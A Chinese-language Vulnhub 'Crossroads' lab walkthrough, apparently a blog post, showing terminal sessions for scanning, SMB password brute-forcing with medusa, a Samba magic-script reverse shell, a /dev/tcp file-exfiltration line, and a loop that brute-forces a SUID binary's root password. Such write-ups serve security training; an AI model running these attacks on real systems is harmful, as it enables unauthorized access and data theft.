Crossroads
识别目标主机IP地址
┌──(kali㉿kali)-[~/Vulnhub/Crossroads]
└─$ sudo netdiscover -i eth1
Currently scanning: 192.168.98.0/16 | Screen View: Unique Hosts
3 Captured ARP Req/Rep packets, from 3 hosts. Total size: 180
_____________________________________________________________________________
IP At MAC Address Count Len MAC Vendor / Hostname
-----------------------------------------------------------------------------
192.168.56.1 0a:00:27:00:00:0a 1 60 Unknown vendor
192.168.56.100 08:00:27:c4:83:a7 1 60 PCS Systemtechnik GmbH
192.168.56.181 08:00:27:b8:0e:1f 1 60 PCS Systemtechnik GmbH
利用Kali Linux自带的netdiscover识别目标主机的IP地址为192.168.56.181
NMAP扫描
┌──(kali㉿kali)-[~/Vulnhub/Crossroads]
└─$ sudo nmap -sS -sV -sC -p- 192.168.56.181 -oN nmap_full_scan
Starting Nmap 7.92 ( https://nmap.org ) at 2022-11-16 06:45 EST
Nmap scan report for bogon (192.168.56.181)
Host is up (0.000076s latency).
Not shown: 65532 closed tcp ports (reset)
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.38 ((Debian))
|_http-title: 12 Step Treatment Center | Crossroads Centre Antigua
|_http-server-header: Apache/2.4.38 (Debian)
| http-robots.txt: 1 disallowed entry
|_/crossroads.png
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 4.9.5-Debian (workgroup: WORKGROUP)
MAC Address: 08:00:27:B8:0E:1F (Oracle VirtualBox virtual NIC)
Service Info: Host: CROSSROADS
Host script results:
| smb-os-discovery:
| OS: Windows 6.1 (Samba 4.9.5-Debian)
| Computer name: crossroads
| NetBIOS computer name: CROSSROADS\x00
| Domain name: \x00
| FQDN: crossroads
|_ System time: 2022-11-16T05:46:02-06:00
|_clock-skew: mean: 1h59m58s, deviation: 3h27m50s, median: -1s
|_nbstat: NetBIOS name: CROSSROADS, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb2-security-mode:
| 3.1.1:
|_ Message signing enabled but not required
| smb2-time:
| date: 2022-11-16T11:46:02
|_ start_date: N/A
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 13.24 seconds
目标主机3个开放端口,80(http),其他两个端口(samba)
Get Access
┌──(kali㉿kali)-[~/Vulnhub/Crossroads]
└─$ smbclient -L 192.168.56.181
Password for [WORKGROUP\kali]:
Sharename Type Comment
--------- ---- -------
print$ Disk Printer Drivers
smbshare Disk
IPC$ IPC IPC Service (Samba 4.9.5-Debian)
Reconnecting with SMB1 for workgroup listing.
Server Comment
--------- -------
Workgroup Master
--------- -------
WORKGROUP CROSSROADS
┌──(kali㉿kali)-[~/Vulnhub/Crossroads]
└─$ smbclient //192.168.56.181/smbshare
Password for [WORKGROUP\kali]:
tree connect failed: NT_STATUS_ACCESS_DENIED
└─$ enum4linux 192.168.56.181
Starting enum4linux v0.9.1 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Wed Nov 16 06:50:29 2022
=========================================( Target Information )=========================================
Target ........... 192.168.56.181
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none
===========================( Enumerating Workgroup/Domain on 192.168.56.181 )===========================
[+] Got domain/workgroup name: WORKGROUP
===============================( Nbtstat Information for 192.168.56.181 )===============================
Looking up status of 192.168.56.181
CROSSROADS <00> - B <ACTIVE> Workstation Service
CROSSROADS <03> - B <ACTIVE> Messenger Service
CROSSROADS <20> - B <ACTIVE> File Server Service
..__MSBROWSE__. <01> - <GROUP> B <ACTIVE> Master Browser
WORKGROUP <00> - <GROUP> B <ACTIVE> Domain/Workgroup Name
WORKGROUP <1d> - B <ACTIVE> Master Browser
WORKGROUP <1e> - <GROUP> B <ACTIVE> Browser Service Elections
MAC Address = 00-00-00-00-00-00
[+] Enumerating users using SID S-1-22-1 and logon username '', password ''
S-1-22-1-1000 Unix User\albert (Local User)
[+] Enumerating users using SID S-1-5-21-198007098-3908253677-2746664996 and logon username '', password ''
S-1-5-21-198007098-3908253677-2746664996-501 CROSSROADS\nobody (Local User)
S-1-5-21-198007098-3908253677-2746664996-513 CROSSROADS\None (Domain Group)
S-1-5-21-198007098-3908253677-2746664996-1001 CROSSROADS\albert (Local User)
发现了用户名albert
接下来看一下80端口的情况
从页面源代码,目标站点运行wordpress
┌──(kali㉿kali)-[~/Vulnhub/Crossroads]
└─$ curl http://192.168.56.181/robots.txt
User-agent: *
Disallow: /crossroads.png
┌──(kali㉿kali)-[~/Vulnhub/Crossroads]
└─$ wget http://192.168.56.181/crossroads.png
--2022-11-16 06:55:46-- http://192.168.56.181/crossroads.png
Connecting to 192.168.56.181:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 1100255 (1.0M) [image/png]
Saving to: ‘crossroads.png’
crossroads.png 100%[================================================================================================================================>] 1.05M --.-KB/s in 0.02s
2022-11-16 06:55:46 (68.9 MB/s) - ‘crossroads.png’ saved [1100255/1100255]
┌──(kali㉿kali)-[~/Vulnhub/Crossroads]
└─$ ls
crossroads.png nmap_full_scan
┌──(kali㉿kali)-[~/Vulnhub/Crossroads]
└─$ steghide extract -sf crossroads.png
Enter passphrase:
steghide: the file format of the file "crossroads.png" is not supported.
┌──(kali㉿kali)-[~/Vulnhub/Crossroads]
└─$ stegseek crossroads.png /usr/share/wordlists/rockyou.txt
StegSeek 0.6 - https://github.com/RickdeJager/StegSeek
[!] error: the file format of the file "crossroads.png" is not supported.
┌──(kali㉿kali)-[~/Vulnhub/Crossroads]
└─$ gobuster dir -u http://192.168.56.181 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
===============================================================
Gobuster v3.2.0-dev
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.56.181
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.2.0-dev
[+] Timeout: 10s
===============================================================
2022/11/16 06:57:15 Starting gobuster in directory enumeration mode
===============================================================
/server-status (Status: 403) [Size: 279]
Progress: 217109 / 220561 (98.43%)===============================================================
2022/11/16 06:57:44 Finished
===============================================================
┌──(kali㉿kali)-[~/Vulnhub/Crossroads]
└─$ dirb http://192.168.56.181
-----------------
DIRB v2.22
By The Dark Raver
-----------------
START_TIME: Wed Nov 16 06:57:55 2022
URL_BASE: http://192.168.56.181/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
-----------------
GENERATED WORDS: 4612
---- Scanning URL: http://192.168.56.181/ ----
+ http://192.168.56.181/index.html (CODE:200|SIZE:93075)
+ http://192.168.56.181/robots.txt (CODE:200|SIZE:42)
+ http://192.168.56.181/server-status (CODE:403|SIZE:279)
-----------------
END_TIME: Wed Nov 16 06:57:56 2022
DOWNLOADED: 4612 - FOUND: 3
┌──(kali㉿kali)-[~/Vulnhub/Crossroads]
└─$ gobuster dir -u http://192.168.56.181 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .php,.html,.txt,.sh
===============================================================
Gobuster v3.2.0-dev
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.56.181
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.2.0-dev
[+] Extensions: sh,php,html,txt
[+] Timeout: 10s
===============================================================
2022/11/16 06:58:12 Starting gobuster in directory enumeration mode
===============================================================
/.html (Status: 403) [Size: 279]
/.php (Status: 403) [Size: 279]
/index.html (Status: 200) [Size: 93075]
/robots.txt (Status: 200) [Size: 42]
/note.txt (Status: 200) [Size: 108]
/.php (Status: 403) [Size: 279]
/.html (Status: 403) [Size: 279]
/server-status (Status: 403) [Size: 279]
Progress: 1099489 / 1102805 (99.70%)===============================================================
2022/11/16 07:00:41 Finished
===============================================================
┌──(kali㉿kali)-[~/Vulnhub/Crossroads]
└─$ curl http://192.168.56.181/note.txt
just find three kings of blues
then move to the crossroads
-------------------------------
-abuzerkomurcu
不知道什么意思,回过头去破解SMB协议,已经知道了用户名
┌──(kali㉿kali)-[~/Vulnhub/Crossroads]
└─$ hydra -l albert -P /usr/share/wordlists/rockyou.txt smb://192.168.56.181
Hydra v9.3 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2022-11-16 07:05:08
[INFO] Reduced number of tasks to 1 (smb does not like parallel connections)
[DATA] max 1 task per 1 server, overall 1 task, 14344399 login tries (l:1/p:14344399), ~14344399 tries per task
[DATA] attacking smb://192.168.56.181:445/
[STATUS] 5065.00 tries/min, 5065 tries in 00:01h, 14339334 to do in 47:12h, 1 active
[STATUS] 5236.67 tries/min, 15710 tries in 00:03h, 14328689 to do in 45:37h, 1 active
[STATUS] 5268.00 tries/min, 36876 tries in 00:07h, 14307523 to do in 45:16h, 1 active
[STATUS] 5246.70 tries/min, 78788 tries in 00:15h, 14265611 to do in 45:19h, 1 active
[STATUS] 5231.90 tries/min, 162276 tries in 00:31h, 14182123 to do in 45:11h, 1 active
[STATUS] 5222.51 tries/min, 245545 tries in 00:47h, 14098854 to do in 44:60h, 1 active
^C
^CThe session file ./hydra.restore was written. Type "hydra -R" to resume session.
没有破解出来,根据其他人的做法需要用medusa
┌──(kali㉿kali)-[~/Vulnhub/Crossroads]
└─$ medusa -h 192.168.56.181 -u albert -P /usr/share/wordlists/rockyou.txt -M smbnt
Medusa v2.2 [http://www.foofus.net] (C) JoMo-Kun / Foofus Networks <jmk@foofus.net>
ACCOUNT CHECK: [smbnt] Host: 192.168.56.181 (1 of 1, 0 complete) User: albert (1 of 1, 0 complete) Password: 123456 (1 of 14344391 complete)
ACCOUNT CHECK: [smbnt] Host: 192.168.56.181 (1 of 1, 0 complete) User: albert (1 of 1, 0 complete) Password: 12345 (2 of 14344391 complete)
ACCOUNT CHECK: [smbnt] Host: 192.168.56.181 (1 of 1, 0 complete) User: albert (1 of 1, 0 complete) Password: 123456789 (3 of 14344391 complete)
ACCOUNT CHECK: [smbnt] Host: 192.168.56.181 (1 of 1, 0 complete) User: albert (1 of 1, 0 complete) Password: password (4 of 14344391 complete)
ACCOUNT CHECK: [smbnt] Host: 192.168.56.181 (1 of 1, 0 complete) User: albert (1 of 1, 0 complete) Password: iloveyou (5 of 14344391 complete)
ACCOUNT CHECK: [smbnt] Host: 192.168.56.181 (1 of 1, 0 complete) User: albert (1 of 1, 0 complete) Password: princess (6 of 14344391 complete)
ACCOUNT CHECK: [smbnt] Host: 192.168.56.181 (1 of 1, 0 complete) User: albert (1 of 1, 0 complete) Password: 1234567 (7 of 14344391 complete)
ACCOUNT CHECK: [smbnt] Host: 192.168.56.181 (1 of 1, 0 complete) User: albert (1 of 1, 0 complete) Password: bradley1 (3842 of 14344391 complete)
ACCOUNT FOUND: [smbnt] Host: 192.168.56.181 User: albert Password: bradley1 [SUCCESS (ADMIN$ - Share Unavailable)]
非常快地就破解出来密码:bradley1 (看来真是不能依赖一种工具)
Medusa支持的模块名称在:
┌──(kali㉿kali)-[/usr/…/dist-packages/faraday_plugins/plugins/repo]
└─$ find / -name *medusa* 2>/dev/null
/usr/lib/x86_64-linux-gnu/medusa
/usr/lib/python3/dist-packages/faraday_plugins/plugins/repo/medusa
/usr/bin/medusa
/usr/share/bash-completion/completions/medusa
/usr/share/doc/medusa
┌──(kali㉿kali)-[/usr/…/dist-packages/faraday_plugins/plugins/repo]
└─$ cd /usr/lib/x86_64-linux-gnu/medusa
┌──(kali㉿kali)-[/usr/lib/x86_64-linux-gnu/medusa]
└─$ ls
modules
┌──(kali㉿kali)-[/usr/lib/x86_64-linux-gnu/medusa]
└─$ cd modules
┌──(kali㉿kali)-[/usr/lib/x86_64-linux-gnu/medusa/modules]
└─$ ls -alh | grep smb
-rwxr-xr-x 1 root root 42K May 15 2022 smbnt.mod
┌──(kali㉿kali)-[/usr/lib/x86_64-linux-gnu/medusa/modules]
└─$ ls
cvs.mod http.mod mssql.mod nntp.mod pop3.mod rexec.mod rsh.mod smtp.mod snmp.mod svn.mod vmauthd.mod web-form.mod
ftp.mod imap.mod mysql.mod pcanywhere.mod postgres.mod rlogin.mod smbnt.mod smtp-vrfy.mod ssh.mod telnet.mod vnc.mod wrapper.mod
┌──(kali㉿kali)-[/usr/lib/x86_64-linux-gnu/medusa/modules]
接下来用前面破解的密码登录SMB
┌──(kali㉿kali)-[~/Vulnhub/Crossroads]
└─$ sudo smbclient //192.168.56.181/smbshare -U albert
[sudo] password for kali:
Password for [WORKGROUP\albert]:
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Tue Mar 2 17:16:13 2021
.. D 0 Sat Mar 6 07:45:15 2021
smb.conf N 8779 Tue Mar 2 17:14:54 2021
4000320 blocks of size 1024. 3759668 blocks available
smb: \> get smb.conf
getting file \smb.conf of size 8779 as smb.conf (4286.4 KiloBytes/sec) (average 4286.6 KiloBytes/sec)
smb: \> exit
┌──(kali㉿kali)-[~/Vulnhub/Crossroads]
└─$ ls
crossroads.png hydra.restore nmap_full_scan smb.conf
┌──(kali㉿kali)-[~/Vulnhub/Crossroads]
└─$ cat smb.conf
#
# Sample configuration file for the Samba suite for Debian GNU/Linux.
#
#
# This is the main Samba configuration file. You should read the
# smb.conf(5) manual page in order to understand the options listed
# here. Samba has a huge number of configurable options most of which
# are not shown in this example
#
# Some options that are often worth tuning have been included as
# commented-out examples in this file.
# - When such options are commented with ";", the proposed setting
# differs from the default Samba behaviour
# - When commented with "#", the proposed setting is the default
# behaviour of Samba but the option is considered important
# enough to be mentioned here
#
# NOTE: Whenever you modify this file you should run the command
# "testparm" to check that you have not made any basic syntactic
# errors.
#======================= Global Settings =======================
[global]
## Browsing/Identification ###
# Change this to the workgroup/NT-domain name your Samba server will part of
workgroup = WORKGROUP
#### Networking ####
# The specific set of interfaces / networks to bind to
# This can be either the interface name or an IP address/netmask;
# interface names are normally preferred
; interfaces = 127.0.0.0/8 eth0
# Only bind to the named interfaces and/or networks; you must use the
# 'interfaces' option above to use this.
# It is recommended that you enable this feature if your Samba machine is
# not protected by a firewall or is a firewall itself. However, this
# option cannot handle dynamic or non-broadcast interfaces correctly.
; bind interfaces only = yes
#### Debugging/Accounting ####
# This tells Samba to use a separate log file for each machine
# that connects
log file = /var/log/samba/log.%m
# Cap the size of the individual log files (in KiB).
max log size = 1000
# We want Samba to only log to /var/log/samba/log.{smbd,nmbd}.
# Append syslog@1 if you want important messages to be sent to syslog too.
logging = file
# Do something sensible when Samba crashes: mail the admin a backtrace
panic action = /usr/share/samba/panic-action %d
####### Authentication #######
# Server role. Defines in which mode Samba will operate. Possible
# values are "standalone server", "member server", "classic primary
# domain controller", "classic backup domain controller", "active
# directory domain controller".
#
# Most people will want "standalone server" or "member server".
# Running as "active directory domain controller" will require first
# running "samba-tool domain provision" to wipe databases and create a
# new domain.
server role = standalone server
obey pam restrictions = yes
# This boolean parameter controls whether Samba attempts to sync the Unix
# password with the SMB password when the encrypted SMB password in the
# passdb is changed.
unix password sync = yes
# For Unix password sync to work on a Debian GNU/Linux system, the following
# parameters must be set (thanks to Ian Kahan <<kahan@informatik.tu-muenchen.de> for
# sending the correct chat script for the passwd program in Debian Sarge).
passwd program = /usr/bin/passwd %u
passwd chat = *Enter\snew\s*\spassword:* %n\n *Retype\snew\s*\spassword:* %n\n *password\supdated\ssuccessfully* .
# This boolean controls whether PAM will be used for password changes
# when requested by an SMB client instead of the program listed in
# 'passwd program'. The default is 'no'.
pam password change = yes
# This option controls how unsuccessful authentication attempts are mapped
# to anonymous connections
map to guest = bad user
########## Domains ###########
#
# The following settings only takes effect if 'server role = primary
# classic domain controller', 'server role = backup domain controller'
# or 'domain logons' is set
#
# It specifies the location of the user's
# profile directory from the client point of view) The following
# required a [profiles] share to be setup on the samba server (see
# below)
; logon path = \\%N\profiles\%U
# Another common choice is storing the profile in the user's home directory
# (this is Samba's default)
# logon path = \\%N\%U\profile
# The following setting only takes effect if 'domain logons' is set
# It specifies the location of a user's home directory (from the client
# point of view)
; logon drive = H:
# logon home = \\%N\%U
# The following setting only takes effect if 'domain logons' is set
# It specifies the script to run during logon. The script must be stored
# in the [netlogon] share
# NOTE: Must be store in 'DOS' file format convention
; logon script = logon.cmd
# This allows Unix users to be created on the domain controller via the SAMR
# RPC pipe. The example command creates a user account with a disabled Unix
# password; please adapt to your needs
; add user script = /usr/sbin/adduser --quiet --disabled-password --gecos "" %u
# This allows machine accounts to be created on the domain controller via the
# SAMR RPC pipe.
# The following assumes a "machines" group exists on the system
; add machine script = /usr/sbin/useradd -g machines -c "%u machine account" -d /var/lib/samba -s /bin/false %u
# This allows Unix groups to be created on the domain controller via the SAMR
# RPC pipe.
; add group script = /usr/sbin/addgroup --force-badname %g
############ Misc ############
# Using the following line enables you to customise your configuration
# on a per machine basis. The %m gets replaced with the netbios name
# of the machine that is connecting
; include = /home/samba/etc/smb.conf.%m
# Some defaults for winbind (make sure you're not using the ranges
# for something else.)
; idmap config * : backend = tdb
; idmap config * : range = 3000-7999
; idmap config YOURDOMAINHERE : backend = tdb
; idmap config YOURDOMAINHERE : range = 100000-999999
; template shell = /bin/bash
# Setup usershare options to enable non-root users to share folders
# with the net usershare command.
# Maximum number of usershare. 0 means that usershare is disabled.
# usershare max shares = 100
# Allow users who've been granted usershare privileges to create
# public shares, not just authenticated ones
usershare allow guests = yes
#======================= Share Definitions =======================
[homes]
comment = Home Directories
browseable = no
# By default, the home directories are exported read-only. Change the
# next parameter to 'no' if you want to be able to write to them.
read only = yes
# File creation mask is set to 0700 for security reasons. If you want to
# create files with group=rw permissions, set next parameter to 0775.
create mask = 0700
# Directory creation mask is set to 0700 for security reasons. If you want to
# create dirs. with group=rw permissions, set next parameter to 0775.
directory mask = 0700
# By default, \\server\username shares can be connected to by anyone
# with access to the samba server.
# The following parameter makes sure that only "username" can connect
# to \\server\username
# This might need tweaking when using external authentication schemes
valid users = %S
# Un-comment the following and create the netlogon directory for Domain Logons
# (you need to configure Samba to act as a domain controller too.)
;[netlogon]
; comment = Network Logon Service
; path = /home/samba/netlogon
; guest ok = yes
; read only = yes
# Un-comment the following and create the profiles directory to store
# users profiles (see the "logon path" option above)
# (you need to configure Samba to act as a domain controller too.)
# The path below should be writable by all users so that their
# profile directory may be created the first time they log on
;[profiles]
; comment = Users profiles
; path = /home/samba/profiles
; guest ok = no
; browseable = no
; create mask = 0600
; directory mask = 0700
[printers]
comment = All Printers
browseable = no
path = /var/spool/samba
printable = yes
guest ok = no
read only = yes
create mask = 0700
# Windows clients look for this share name as a source of downloadable
# printer drivers
[print$]
comment = Printer Drivers
path = /var/lib/samba/printers
browseable = yes
read only = yes
guest ok = no
# Uncomment to allow remote administration of Windows print drivers.
# You may need to replace 'lpadmin' with the name of the group your
# admin users are members of.
# Please note that you also need to set appropriate Unix permissions
# to the drivers directory for these users to have write rights in it
; write list = root, @lpadmin
[smbshare]
path = /home/albert/smbshare
valid users = albert
browsable = yes
writable = yes
read only = no
magic script = smbscript.sh
guest ok = no
发现 magic script 选项,网上解释说打开共享文件夹的时候就会执行 magic script 指定的脚本。 那我们就编写一个 script 上传到这个文件夹里面。
首先在Kali上启动侦听,然后smb连接目标主机,put script脚本,在put过程中shell就会被反弹回kali
┌──(kali㉿kali)-[~/Vulnhub/Crossroads]
└─$ sudo smbclient //192.168.56.181/smbshare -U albert
Password for [WORKGROUP\albert]:
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Tue Mar 2 17:16:13 2021
.. D 0 Sat Mar 6 07:45:15 2021
smb.conf N 8779 Tue Mar 2 17:14:54 2021
4000320 blocks of size 1024. 3759668 blocks available
smb: \> put smbscript.sh
NT_STATUS_UNSUCCESSFUL closing remote file \smbscript.sh
smb: \> ls
. D 0 Wed Nov 16 08:09:27 2022
.. D 0 Sat Mar 6 07:45:15 2021
smb.conf N 8779 Tue Mar 2 17:14:54 2021
4000320 blocks of size 1024. 3759668 blocks available
smb: \> put smbscript.sh
NT_STATUS_IO_TIMEOUT closing remote file \smbscript.sh
smb: \>
──(kali㉿kali)-[~/Vulnhub/Crossroads]
└─$ sudo nc -nlvp 5555
[sudo] password for kali:
listening on [any] 5555 ...
connect to [192.168.56.137] from (UNKNOWN) [192.168.56.181] 36580
id
uid=1000(albert) gid=1000(albert) groups=1000(albert)
which python
/usr/bin/python
python -c 'import pty;pty.spawn("/bin/bash")'
albert@crossroads:/home/albert/smbshare$
成功拿到了shell
另外spawn一个shell,将crossroads.png以及beroot文件下载到kali
┌──(kali㉿kali)-[~/Vulnhub/Crossroads]
└─$ sudo nc -nlvp 8888 > cross.jpg
[sudo] password for kali:
listening on [any] 8888 ...
connect to [192.168.56.137] from (UNKNOWN) [192.168.56.181] 55362
albert@crossroads:/home/albert$ ls -alh
ls -alh
total 1.6M
drwxr-xr-x 3 albert albert 4.0K Mar 6 2021 .
drwxr-xr-x 3 root root 4.0K Mar 2 2021 ..
-rwsr-xr-x 1 root root 17K Mar 2 2021 beroot
-rw-r--r-- 1 albert albert 1.6M Mar 2 2021 crossroads.png
drwxrwxrwx 2 albert albert 4.0K Nov 16 07:10 smbshare
-r-x------ 1 albert albert 1.8K Jan 3 2021 user.txt
albert@crossroads:/home/albert$ cat crossroads.png > /dev/tcp/192.168.56.137/8888
<$ cat crossroads.png > /dev/tcp/192.168.56.137/8888
albert@crossroads:/home/albert$
由于 steghide 不支持 png 文件,查看其他人的做法发现了一个新的工具:stegoveritas
┌──(kali㉿kali)-[~/Vulnhub/Crossroads]
└─$ sudo pip install stegoveritas
Collecting stegoveritas
Downloading stegoveritas-1.9.tar.gz (77 kB)
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ 77.8/77.8 kB 177.6 kB/s eta 0:00:00
Preparing metadata (setup.py) ... done
Collecting ┌──(kali㉿kali)-[~/Vulnhub/Crossroads]
└─$ stegoveritas cross.png
ERROR:StegoVeritas:Missing the following required packages: foremost, libexempi3
ERROR:StegoVeritas:Either install them manually or run 'stegoveritas_install_deps'.
Running Module: SVImage
+---------------------------+------+
| Image Format | Mode |
+---------------------------+------+
| Portable network graphics | RGBA |
+---------------------------+------+
ERROR:stegoveritas.helpers:not supported for this image mode
ERROR:stegoveritas.helpers:
""" apng
┌──(kali㉿kali)-[~/Vulnhub/Crossroads/results/keepers]
└─$ ls
1668605632.515148-acdbbd842fee9302ae4de398d1ab2300 1668605655.125798-bcffc227ec961d9a422307bc56aa9f80 1668605658.7701492-c264536d7e1bbac0e84d7561bd46aacd 1668605662.1177938-deacfe6927ff1e957b146f28457567cf
1668605635.4692078-cdaac7888d6459d35735a7a017745968 1668605655.8980753-4aef70b7df286874d7f5bf43305de4bb 1668605659.3538682-7aabde43efa4d275e91debe133aa8673 1668605679.751733-f925d60b59b4b1cb85922e3b7efcbcde
1668605652.915446-dce62c225527f62f593c71e9fdfbe765 1668605657.028825-c3d9ec0541be0e353038bbaa263d8406 1668605661.0991077-b893f2c01edf8bb4d21bb2ce9c510156 29
1668605654.491967-2c2e9e198566dca626c518c23661cabc 1668605657.3429148-c0d183c52e81f473c0daafe50e0eece4 1668605662.0214634-f5b1ded00bfad7d6160891ff386379c1 29.zlib
┌──(kali㉿kali)-[~/Vulnhub/Crossroads/results/keepers]
└─$
┌──(kali㉿kali)-[~/Vulnhub/Crossroads/results/keepers]
└─$
┌──(kali㉿kali)-[~/Vulnhub/Crossroads/results/keepers]
└─$ pwd
/home/kali/Vulnhub/Crossroads/results/keepers
┌──(kali㉿kali)-[~/Vulnhub/Crossroads/results/keepers]
只有第一个文件看起来时密码字典,改一下名字,然后上传到目标主机
──(kali㉿kali)-[~/Vulnhub/Crossroads/results/keepers]
└─$ pwd
/home/kali/Vulnhub/Crossroads/results/keepers
┌──(kali㉿kali)-[~/Vulnhub/Crossroads/results/keepers]
└─$ mv 1668605632.515148-acdbbd842fee9302ae4de398d1ab2300 passlist
┌──(kali㉿kali)-[~/Vulnhub/Crossroads/results/keepers]
└─$ ls
1668605635.4692078-cdaac7888d6459d35735a7a017745968 1668605655.8980753-4aef70b7df286874d7f5bf43305de4bb 1668605659.3538682-7aabde43efa4d275e91debe133aa8673 1668605679.751733-f925d60b59b4b1cb85922e3b7efcbcde
1668605652.915446-dce62c225527f62f593c71e9fdfbe765 1668605657.028825-c3d9ec0541be0e353038bbaa263d8406 1668605661.0991077-b893f2c01edf8bb4d21bb2ce9c510156 29
1668605654.491967-2c2e9e198566dca626c518c23661cabc 1668605657.3429148-c0d183c52e81f473c0daafe50e0eece4 1668605662.0214634-f5b1ded00bfad7d6160891ff386379c1 29.zlib
1668605655.125798-bcffc227ec961d9a422307bc56aa9f80 1668605658.7701492-c264536d7e1bbac0e84d7561bd46aacd 1668605662.1177938-deacfe6927ff1e957b146f28457567cf passlist
┌──(kali㉿kali)-[~/Vulnhub/Crossroads/results/keepers]
└─$ python -m http.server
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
192.168.56.181 - - [16/Nov/2022 08:46:38] "GET /passlist HTTP/1.1" 200 -
albert@crossroads:/home/albert$ ls
ls
beroot crossroads.png passlist smbshare user.txt
albert@crossroads:/home/albert$ ls -alh
ls -alh
total 1.9M
drwxr-xr-x 3 albert albert 4.0K Nov 16 07:46 .
drwxr-xr-x 3 root root 4.0K Mar 2 2021 ..
-rwsr-xr-x 1 root root 17K Mar 2 2021 beroot
-rw-r--r-- 1 albert albert 1.6M Mar 2 2021 crossroads.png
-rw-rw-rw- 1 albert albert 355K Nov 16 07:33 passlist
drwxrwxrwx 2 albert albert 4.0K Nov 16 07:10 smbshare
-r-x------ 1 albert albert 1.8K Jan 3 2021 user.txt
albert@crossroads:/home/albert$
beroot程序有SUID位,可以用来提权,运行这个程序提示需要输入root密码
albert@crossroads:/home/albert$ ./beroot
./beroot
TERM environment variable not set.
enter password for root
-----------------------
password: dd
dd
wrong password!!!
因此编写shell脚本,对密码进行爆破:
for i in $(cat passlist);do echo $i | ./beroot; echo $i;done | grep -v wrong
albert@crossroads:/home/albert$ cat rootcreds
cat rootcreds
root
___drifting___
albert@crossroads:/home/albert$ su - root
su - root
Password: ___drifting___
root@crossroads:~# cd /root
cd /root
root@crossroads:~# ls
ls
beroot.sh creds passwd root.txt
root@crossroads:~# cat root.txt
cat root.txt
flag 2/2
░░░░░░▄▄▄▄▀▀▀▀▀▀▀▀▄▄▄▄▄▄▄
░░░░░█░░░░░░░░░░░░░░░░░░▀▀▄
░░░░█░░░░░░░░░░░░░░░░░░░░░░█
░░░█░░░░░░▄██▀▄▄░░░░░▄▄▄░░░░█
░▄▀░▄▄▄░░█▀▀▀▀▄▄█░░░██▄▄█░░░░█
█░░█░▄░▀▄▄▄▀░░░░░░░░█░░░░░░░░░█
█░░█░█▀▄▄░░░░░█▀░░░░▀▄░░▄▀▀▀▄░█
░█░▀▄░█▄░█▀▄▄░▀░▀▀░▄▄▀░░░░█░░█
░░█░░░▀▄▀█▄▄░█▀▀▀▄▄▄▄▀▀█▀██░█
░░░█░░░░██░░▀█▄▄▄█▄▄█▄▄██▄░░█
░░░░█░░░░▀▀▄░█░░░█░█▀█▀█▀██░█
░░░░░▀▄░░░░░▀▀▄▄▄█▄█▄█▄█▄▀░░█
░░░░░░░▀▄▄░░░░░░░░░░░░░░░░░░░█
░░▐▌░█░░░░▀▀▄▄░░░░░░░░░░░░░░░█
░░░█▐▌░░░░░░█░▀▄▄▄▄▄░░░░░░░░█
░░███░░░░░▄▄█░▄▄░██▄▄▄▄▄▄▄▄▀
░▐████░░▄▀█▀█▄▄▄▄▄█▀▄▀▄
░░█░░▌░█░░░▀▄░█▀█░▄▀░░░█
░░█░░▌░█░░█░░█░░░█░░█░░█
░░█░░▀▀░░██░░█░░░█░░█░░█
░░░▀▀▄▄▀▀░█░░░▀▄▀▀▀▀█░░█
congratulations!
root@crossroads:~#
root@crossroads:~#
成功拿到root flag
标签:56.181,kali,albert,192.168,Crossroads,Vulnhub,靶机,crossroads From: https://www.cnblogs.com/jason-huawen/p/16897851.html